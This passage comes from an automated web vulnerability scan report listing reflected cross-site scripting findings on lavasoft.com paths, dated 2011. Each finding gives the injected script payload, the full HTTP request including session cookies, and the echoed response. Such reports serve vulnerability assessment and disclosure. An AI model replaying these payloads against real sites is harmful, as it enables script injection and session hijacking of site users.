Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/forum9459e'><script>alert(1)</script>60483082767/forum.css'>
...[SNIP]...

1.181. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82edb'><script>alert(1)</script>3e9ba5b1bc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/forum/forum.css82edb'><script>alert(1)</script>3e9ba5b1bc6?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/forum/forum.css82edb'><script>alert(1)</script>3e9ba5b1bc6'>
...[SNIP]...

1.182. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 450c0'><script>alert(1)</script>e48049f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft450c0'><script>alert(1)</script>e48049f0f5/modules/img_assist/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft450c0'><script>alert(1)</script>e48049f0f5/modules/img_assist/img_assist.css?w'>
...[SNIP]...

1.183. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55c3a'><script>alert(1)</script>4cd751fd905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules55c3a'><script>alert(1)</script>4cd751fd905/img_assist/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18252
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules55c3a'><script>alert(1)</script>4cd751fd905/img_assist/img_assist.css'>
...[SNIP]...

1.184. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8f4b'><script>alert(1)</script>3e472aa4d6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assistb8f4b'><script>alert(1)</script>3e472aa4d6e/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18214
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assistb8f4b'><script>alert(1)</script>3e472aa4d6e/img_assist.css'>
...[SNIP]...

1.185. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f909c'><script>alert(1)</script>f2d938a6d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assist/img_assist.cssf909c'><script>alert(1)</script>f2d938a6d94?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18214
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assist/img_assist.cssf909c'><script>alert(1)</script>f2d938a6d94'>
...[SNIP]...

1.186. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1a65'><script>alert(1)</script>278b2720f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftb1a65'><script>alert(1)</script>278b2720f83/modules/img_assist/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftb1a65'><script>alert(1)</script>278b2720f83/modules/img_assist/img_assist.js?w'>
...[SNIP]...

1.187. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45a38'><script>alert(1)</script>0315653ed5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules45a38'><script>alert(1)</script>0315653ed5b/img_assist/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules45a38'><script>alert(1)</script>0315653ed5b/img_assist/img_assist.js'>
...[SNIP]...

1.188. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3908'><script>alert(1)</script>9a992f154c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assistf3908'><script>alert(1)</script>9a992f154c/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assistf3908'><script>alert(1)</script>9a992f154c/img_assist.js'>
...[SNIP]...

1.189. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b9a'><script>alert(1)</script>e31a7e2f8d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assist/img_assist.js57b9a'><script>alert(1)</script>e31a7e2f8d4?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18212
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assist/img_assist.js57b9a'><script>alert(1)</script>e31a7e2f8d4'>
...[SNIP]...

1.190. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b8e3'><script>alert(1)</script>b2e7545d254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9b8e3'><script>alert(1)</script>b2e7545d254/modules/node/node.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9b8e3'><script>alert(1)</script>b2e7545d254/modules/node/node.css?w'>
...[SNIP]...

1.191. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b77a'><script>alert(1)</script>236573ae363 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules5b77a'><script>alert(1)</script>236573ae363/node/node.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18338
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules5b77a'><script>alert(1)</script>236573ae363/node/node.css'>
...[SNIP]...

1.192. http://www.lavasoft.com/mylavasoft/modules/node/node.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/node/node.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3037e'><script>alert(1)</script>5801b21d286 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/node3037e'><script>alert(1)</script>5801b21d286/node.css?w HTTP/1.1
Host: www.lavasoft.com
